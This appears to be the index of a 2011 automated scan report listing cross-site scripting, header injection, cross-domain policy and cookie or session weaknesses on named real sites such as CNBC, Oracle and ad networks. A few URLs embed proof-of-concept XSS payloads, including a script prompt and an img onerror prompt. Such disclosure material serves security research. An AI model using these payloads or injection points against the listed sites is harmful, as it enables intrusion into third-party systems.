XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09062011-02 Report generated by XSS.CX at Tue Sep 06 16:07:58 GMT-06:00 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. Cross-site scripting (stored)
2. HTTP header injection
2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]
2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]
2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]
2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter]
2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]
2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]
2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter]
2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]
3. Cross-site scripting (reflected)
3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
3.4. http://ads.rnmd.net/getAds [adDiv parameter]
3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]
3.6. http://api-public.addthis.com/url/shares.json [callback parameter]
3.7. http://api.bizographics.com/v1/profile.json [api_key parameter]
3.8. http://api.bizographics.com/v1/profile.json [callback parameter]
3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]
3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]
3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]
3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]
3.14. http://api.viglink.com/api/ping [jsonp parameter]
3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]
3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter]
3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter]
3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter]
3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter]
3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter]
3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter]
3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter]
3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]
3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]
3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
3.26. http://cdn.krxd.net/config/ [site parameter]
3.27. http://content.plymedia.com/initialize [video parameter]
3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter]
3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]
3.30. http://digg.com/submit [REST URL parameter 1]
3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]
3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]
3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]
3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]
3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]
3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]
3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]
3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]
3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
3.41. http://js.revsci.net/gateway/gw.js [csid parameter]
3.42. https://login.cnbc.com/cas/login [apphome parameter]
3.43. https://login.cnbc.com/cas/login [jsessionid parameter]
3.44. https://login.cnbc.com/cas/login [login_view parameter]
3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]
3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]
3.47. https://login.cnbc.com/cas/login [service parameter]
3.48. https://login.cnbc.com/cas/login [source parameter]
3.49. https://login.cnbc.com/cas/login [source_type parameter]
3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]
3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]
3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]
3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1]
3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]
3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]
3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]
3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]
3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]
3.59. http://ping.crowdscience.com/ping.js [m parameter]
3.60. http://pixel.adsafeprotected.com/jspix [anId parameter]
3.61. http://pixel.adsafeprotected.com/jspix [campId parameter]
3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter]
3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]
3.65. http://search.cnbc.com/main.do [keywords parameter]
3.66. http://search.cnbc.com/main.do [keywords parameter]
3.67. http://search.cnbc.com/main.do [keywords parameter]
3.68. http://search.cnbc.com/main.do [keywords parameter]
3.69. http://search.cnbc.com/main.do [pubfreq parameter]
3.70. http://search.cnbc.com/main.do [pubfreq parameter]
3.71. http://search.cnbc.com/main.do [sort parameter]
3.72. http://search.cnbc.com/main.do [sort parameter]
3.73. http://serve.directdigitalllc.com/serve.php [click parameter]
3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]
3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]
3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter]
3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]
3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]
3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]
3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]
3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]
3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]
3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]
3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]
3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]
3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]
3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]
3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]
3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]
3.90. http://www.linkedin.com/countserv/count/share [url parameter]
3.91. http://www.sapient.com/en-us/search.html [search parameter]
3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header]
3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]
3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]
3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]
3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]
3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]
3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]
3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]
4. Flash cross-domain policy
4.1. http://a.tribalfusion.com/crossdomain.xml
4.2. http://a1.interclick.com/crossdomain.xml
4.3. http://action.mathtag.com/crossdomain.xml
4.4. http://ad.doubleclick.net/crossdomain.xml
4.5. http://admin.brightcove.com/crossdomain.xml
4.6. http://ads.pointroll.com/crossdomain.xml
4.7. http://ads.rnmd.net/crossdomain.xml
4.8. http://afe.specificclick.net/crossdomain.xml
4.9. http://ajax.googleapis.com/crossdomain.xml
4.10. http://altfarm.mediaplex.com/crossdomain.xml
4.11. http://at.amgdgt.com/crossdomain.xml
4.12. http://b.scorecardresearch.com/crossdomain.xml
4.13. http://c.betrad.com/crossdomain.xml
4.14. http://c.brightcove.com/crossdomain.xml
4.15. http://cache.specificmedia.com/crossdomain.xml
4.16. http://cdn.gigya.com/crossdomain.xml
4.17. http://cdn5.tribalfusion.com/crossdomain.xml
4.18. http://clk.fetchback.com/crossdomain.xml
4.19. http://content.links.channelintelligence.com/crossdomain.xml
4.20. http://content.plymedia.com/crossdomain.xml
4.21. http://core.insightexpressai.com/crossdomain.xml
4.22. http://d.adroll.com/crossdomain.xml
4.23. http://d.ads.readwriteweb.com/crossdomain.xml
4.24. http://d1.openx.org/crossdomain.xml
4.25. http://d7.zedo.com/crossdomain.xml
4.26. http://fls.doubleclick.net/crossdomain.xml
4.27. http://goku.brightcove.com/crossdomain.xml
4.28. http://gscounters.gigya.com/crossdomain.xml
4.29. http://ib.adnxs.com/crossdomain.xml
4.30. http://img-cdn.mediaplex.com/crossdomain.xml
4.31. http://imp.fetchback.com/crossdomain.xml
4.32. http://intelligence.marykay.com/crossdomain.xml
4.33. http://js.revsci.net/crossdomain.xml
4.34. http://l.betrad.com/crossdomain.xml
4.35. http://load.tubemogul.com/crossdomain.xml
4.36. http://log30.doubleverify.com/crossdomain.xml
4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml
4.38. http://network.realmedia.com/crossdomain.xml
4.39. http://now.eloqua.com/crossdomain.xml
4.40. http://oimg.m.cnbc.com/crossdomain.xml
4.41. http://oimg.nbcuni.com/crossdomain.xml
4.42. http://omni.csc.com/crossdomain.xml
4.43. http://oracle.112.2o7.net/crossdomain.xml
4.44. http://oracleglobal.112.2o7.net/crossdomain.xml
4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml
4.46. http://p.brilig.com/crossdomain.xml
4.47. http://pg.links.channelintelligence.com/crossdomain.xml
4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml
4.49. http://ping.crowdscience.com/crossdomain.xml
4.50. http://pix04.revsci.net/crossdomain.xml
4.51. http://pixel.adsafeprotected.com/crossdomain.xml
4.52. http://pixel.everesttech.net/crossdomain.xml
4.53. http://pixel.fetchback.com/crossdomain.xml
4.54. http://pixel.mathtag.com/crossdomain.xml
4.55. http://pixel.quantserve.com/crossdomain.xml
4.56. http://pro.cnbc.com/crossdomain.xml
4.57. http://r.casalemedia.com/crossdomain.xml
4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml
4.59. http://receive.inplay.tubemogul.com/crossdomain.xml
4.60. http://reviews.gillettevenus.com/crossdomain.xml
4.61. http://s0.2mdn.net/crossdomain.xml
4.62. http://search.twitter.com/crossdomain.xml
4.63. http://secure-us.imrworldwide.com/crossdomain.xml
4.64. http://services.plymedia.com/crossdomain.xml
4.65. http://speed.pointroll.com/crossdomain.xml
4.66. http://static.plymedia.com/crossdomain.xml
4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml
4.68. http://stats.deloitte.com/crossdomain.xml
4.69. http://statse.webtrendslive.com/crossdomain.xml
4.70. http://tags.bluekai.com/crossdomain.xml
4.71. http://tf.nexac.com/crossdomain.xml
4.72. http://ttwbs.channelintelligence.com/crossdomain.xml
4.73. http://wingateweb.112.2o7.net/crossdomain.xml
4.74. http://ad.wsod.com/crossdomain.xml
4.75. http://adadvisor.net/crossdomain.xml
4.76. http://ads.adsonar.com/crossdomain.xml
4.77. http://ads1.msn.com/crossdomain.xml
4.78. http://adx.g.doubleclick.net/crossdomain.xml
4.79. http://assets1.csc.com/crossdomain.xml
4.80. http://blogs.oracle.com/crossdomain.xml
4.81. http://bstats.adbrite.com/crossdomain.xml
4.82. http://channelsun.sun.com/crossdomain.xml
4.83. https://cms.paypal.com/crossdomain.xml
4.84. http://cnbc.com/crossdomain.xml
4.85. http://cvs.shoplocal.com/crossdomain.xml
4.86. http://data.cnbc.com/crossdomain.xml
4.87. http://developers.facebook.com/crossdomain.xml
4.88. http://disqus.com/crossdomain.xml
4.89. http://edge.sapient.com/crossdomain.xml
4.90. http://event.on24.com/crossdomain.xml
4.91. https://event.on24.com/crossdomain.xml
4.92. http://executivevision.cnbc.com/crossdomain.xml
4.93. http://js.adsonar.com/crossdomain.xml
4.94. http://login.cnbc.com/crossdomain.xml
4.95. https://login.cnbc.com/crossdomain.xml
4.96. http://m.cnbc.com/crossdomain.xml
4.97. http://media.cnbc.com/crossdomain.xml
4.98. http://msnbcmedia.msn.com/crossdomain.xml
4.99. http://optimized-by.rubiconproject.com/crossdomain.xml
4.100. http://pagead2.googlesyndication.com/crossdomain.xml
4.101. http://pi.pardot.com/crossdomain.xml
4.102. http://quote.cnbc.com/crossdomain.xml
4.103. http://rd.rlcdn.com/crossdomain.xml
4.104. http://search.cnbc.com/crossdomain.xml
4.105. http://server.iad.liveperson.net/crossdomain.xml
4.106. http://snas.nbcuni.com/crossdomain.xml
4.107. https://support.oracle.com/crossdomain.xml
4.108. http://symlookup.cnbc.com/crossdomain.xml
4.109. http://videometa.cnbc.com/crossdomain.xml
4.110. http://w.sharethis.com/crossdomain.xml
4.111. http://wd.sharethis.com/crossdomain.xml
4.112. http://www.apture.com/crossdomain.xml
4.113. http://www.atg.com/crossdomain.xml
4.114. https://www.atg.com/crossdomain.xml
4.115. http://www.cnbc.com/crossdomain.xml
4.116. http://www.csc.com/crossdomain.xml
4.117. http://www.deloitte.com/crossdomain.xml
4.118. http://www.facebook.com/crossdomain.xml
4.119. http://www.fetchback.com/crossdomain.xml
4.120. http://www.marykay.com/crossdomain.xml
4.121. http://www.msnbc.msn.com/crossdomain.xml
4.122. http://www.oracle.com/crossdomain.xml
4.123. http://www.oracleimg.com/crossdomain.xml
4.124. http://www.sapient.com/crossdomain.xml
4.125. http://www.youtube.com/crossdomain.xml
4.126. http://www2.znode.com/crossdomain.xml
4.127. http://1215.ic-live.com/crossdomain.xml
4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml
4.129. http://api.twitter.com/crossdomain.xml
4.130. https://docs.google.com/crossdomain.xml
4.131. http://search.oracle.com/crossdomain.xml
4.132. http://sophelle.app5.hubspot.com/crossdomain.xml
4.133. http://sun.edgeboss.net/crossdomain.xml
4.134. http://twitter.com/crossdomain.xml
4.135. http://www.covergirl.com/crossdomain.xml
5. Silverlight cross-domain policy
5.1. http://ad.doubleclick.net/clientaccesspolicy.xml
5.2. http://ads.pointroll.com/clientaccesspolicy.xml
5.3. http://ads1.msn.com/clientaccesspolicy.xml
5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml
5.5. http://intelligence.marykay.com/clientaccesspolicy.xml
5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml
5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml
5.8. http://omni.csc.com/clientaccesspolicy.xml
5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml
5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml
5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml
5.12. http://pixel.quantserve.com/clientaccesspolicy.xml
5.13. http://s0.2mdn.net/clientaccesspolicy.xml
5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
5.15. http://speed.pointroll.com/clientaccesspolicy.xml
5.16. http://stats.deloitte.com/clientaccesspolicy.xml
5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml
5.18. http://cnbc.com/clientaccesspolicy.xml
5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml
5.20. http://executivevision.cnbc.com/clientaccesspolicy.xml
5.21. http://media.cnbc.com/clientaccesspolicy.xml
5.22. http://msnbcmedia.msn.com/clientaccesspolicy.xml
5.23. http://www.cnbc.com/clientaccesspolicy.xml
6. Cleartext submission of password
6.1. http://digg.com/submit
6.2. http://www.bigcommerce.com/freetrial.php
6.3. http://www.oraclecfo.com/Authentication/Login_w.html
6.4. http://www.oraclecfo.com/Main/Home/Home_w.html
6.5. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
6.6. http://www.shopify.com/login
7. SSL cookie without secure flag set
7.1. https://forums.oracle.com/forums/adfAuthentication
7.2. https://forums.oracle.com/forums/category.jspa
7.3. https://forums.oracle.com/forums/guestsettings!default.jspa
7.4. https://forums.oracle.com/forums/index.jspa
7.5. https://forums.oracle.com/forums/login!withRedirect.jspa
7.6. https://forums.oracle.com/forums/main.jspa
7.7. https://register.cnbc.com/forgotPassword.do
7.8. https://register.cnbc.com/memberCenter.do
7.9. https://register.cnbc.com/registerUser.do
7.10. https://login.cnbc.com/cas/logout
7.11. https://login.oracle.com/favicon.ico
7.12. https://login.oracle.com/mysso/signon.jsp
7.13. https://login.oracle.com/mysso/sso_loginui/b-bg.gif
7.14. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
7.15. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
7.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
7.17. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
7.18. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
7.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
7.20. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
7.21. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
7.22. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
7.23. https://login.oracle.com/mysso/sso_loginui/loginStyling.css
7.24. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
7.25. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
7.26. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
7.27. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
7.28. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
7.29. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
7.30. https://login.oracle.com/mysso/sso_loginui/sso_check.js
7.31. https://login.oracle.com/mysso/sso_loginui/t-bg.gif
7.32. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
7.33. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
7.34. https://login.oracle.com/oam/server/sso/auth_cred_submit
7.35. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
7.36. https://register.cnbc.com/
7.37. https://register.cnbc.com/RandomImage.jsp
7.38. https://register.cnbc.com/cas
7.39. https://register.cnbc.com/checkemail.do
7.40. https://register.cnbc.com/checkpassword.do
7.41. https://register.cnbc.com/checkscreenname.do
7.42. https://register.cnbc.com/checkzipcode.do
7.43. https://register.cnbc.com/createUser.do
7.44. https://register.cnbc.com/css/forgotPassword.css
7.45. https://register.cnbc.com/css/member_center_sytles.css
7.46. https://register.cnbc.com/css/newRegistration.css
7.47. https://register.cnbc.com/css/registration.css
7.48. https://register.cnbc.com/email/EmailSupport.jsp
7.49. https://register.cnbc.com/favicon.ico
7.50. https://register.cnbc.com/forgotPassword1.do
7.51. https://register.cnbc.com/forgotpassword1.jsp
7.52. https://register.cnbc.com/images/clickToContinue.gif
7.53. https://register.cnbc.com/images/loaderImage.gif
7.54. https://register.cnbc.com/images/memberCenterHeader.jpg
7.55. https://register.cnbc.com/images/submitPreferences.jpg
7.56. https://register.cnbc.com/images/tick.jpg
7.57. https://register.cnbc.com/images/tile_02.gif
7.58. https://register.cnbc.com/images/wrong.jpg
7.59. https://register.cnbc.com/js/membercenter.js
7.60. https://register.cnbc.com/js/prototype_ajax.js
7.61. https://register.cnbc.com/js/registrationBasic.js
7.62. https://register.cnbc.com/js/registrationUtils.js
7.63. https://register.cnbc.com/js/registrationValidations.js
7.64. https://register.cnbc.com/js/s_code.js
7.65. https://register.cnbc.com/js/validation.js
7.66. https://register.cnbc.com/quote-html-webservice/fvquote.htm
7.67. https://register.cnbc.com/quote-html-webservice/quote.htm
7.68. https://register.cnbc.com/refreshlogin.jsp
8. Session token in URL
8.1. http://blogs.oracle.com/roller-ui/cwpLogin.jsp
8.2. https://forums.oracle.com/forums/category.jspa
8.3. https://forums.oracle.com/forums/main.jspa
8.4. https://forums.oracle.com/forums/style/style.jsp
8.5. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg
8.6. https://forums.oracle.com/forums/themes/english/resources/info_company.gif
8.7. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif
8.8. https://forums.oracle.com/forums/themes/english/resources/otn_new.css
8.9. https://forums.oracle.com/forums/themes/english/resources/s_code.js
8.10. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js
8.11. https://forums.oracle.com/forums/themes/english/resources/spacer.gif
8.12. https://forums.oracle.com/forums/themes/english/resources/style.css
8.13. http://l.sharethis.com/pview
8.14. https://login.cnbc.com/cas/login
8.15. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
8.16. https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif
8.17. https://myprofile.oracle.com/EndUser/adf/images/siready.gif
8.18. https://myprofile.oracle.com/EndUser/adf/images/t.gif
8.19. https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js
8.20. https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css
8.21. https://myprofile.oracle.com/EndUser/images/fading-background.png
8.22. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
8.23. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
8.24. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
8.25. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
8.26. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
8.27. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
8.28. http://www.apture.com/js/apture.js
8.29. http://www.atg.com/
8.30. http://www.atg.com/en/solutions/
8.31. http://www.atg.com/service/main.jsp
8.32. http://www.atg.com/service/main.jsp
8.33. https://www.atg.com/en/customers/listing/
8.34. https://www.atg.com/en/password/request/
8.35. https://www.atg.com/en/register/
8.36. https://www.atg.com/service/main.jsp
8.37. http://www.facebook.com/extern/login_status.php
8.38. http://www.google.com/search
8.39. http://www.oracle.com/us/technologies/virtualization/index.html
8.40. http://www.oracle.com/webapps/dialogue/dlgpage.jsp
8.41. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22
8.42. http://www.readwriteweb.com/404.html
9. SSL certificate
9.1. https://account.bigcommerce.com/
9.2. https://myshopify.com/
9.3. https://support.bigcommerce.com/
9.4. https://www.bigcommerce.com/
9.5. https://bugzilla.mozilla.org/
9.6. https://cms.paypal.com/
9.7. https://deloitte.zettaneer.com/
9.8. https://dne.oracle.com/
9.9. https://docs.google.com/
9.10. https://education.oracle.com/
9.11. https://event.on24.com/
9.12. https://forms.netsuite.com/
9.13. https://forums.oracle.com/
9.14. https://login.cnbc.com/
9.15. https://login.oracle.com/
9.16. https://myprofile.oracle.com/
9.17. https://oracleus.wingateweb.com/
9.18. https://register.cnbc.com/
9.19. https://shop.oracle.com/
9.20. https://support.oracle.com/
9.21. https://www.atg.com/
9.22. https://www.cvs.com/
10. Password field submitted using GET method
11. ASP.NET ViewState without MAC enabled
12. Cookie scoped to parent domain
12.1. http://api.twitter.com/1/statuses/user_timeline.json
12.2. http://convctr.overture.com/images/cc/cc.gif
12.3. http://pg.links.origin.channelintelligence.com/pages/wl.asp
12.4. http://pixel.everesttech.net/1688/i
12.5. http://ttwbs.channelintelligence.com/
12.6. http://a.tribalfusion.com/displayAd.js
12.7. http://a.tribalfusion.com/i.cid
12.8. http://a.tribalfusion.com/j.ad
12.9. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
12.10. http://a.tribalfusion.com/z/i.cid
12.11. http://ads.pointroll.com/PortalServe/
12.12. http://api.bizographics.com/v1/profile.redirect
12.13. http://b.scorecardresearch.com/b
12.14. http://c.statcounter.com/t.php
12.15. http://clk.fetchback.com/serve/fb/click
12.16. http://clk.fetchback.com/serve/fb/engmnt
12.17. https://cms.paypal.com/us/cgi-bin/
12.18. http://developers.facebook.com/plugins/
12.19. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi
12.20. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
12.21. http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif
12.22. http://imp.fetchback.com/serve/fb/adtag.js
12.23. http://imp.fetchback.com/serve/fb/imp
12.24. https://login.cnbc.com/cas/logout
12.25. http://m1215.ic-live.com/522/
12.26. http://m1460.ic-live.com/586/
12.27. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
12.28. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
12.29. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
12.30. http://optimized-by.rubiconproject.com/a/dk.html
12.31. http://optimized-by.rubiconproject.com/a/dk.js
12.32. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
12.33. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
12.34. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
12.35. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
12.36. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
12.37. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
12.38. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
12.39. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
12.40. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
12.41. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
12.42. http://p.brilig.com/contact/bct
12.43. http://pi.pardot.com/analytics
12.44. http://ping.crowdscience.com/ping.js
12.45. http://pixel.fetchback.com/serve/fb/pdc
12.46. http://pixel.quantserve.com/pixel
12.47. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif
12.48. http://r.openx.net/img
12.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.51. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.52. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.53. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
12.54. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
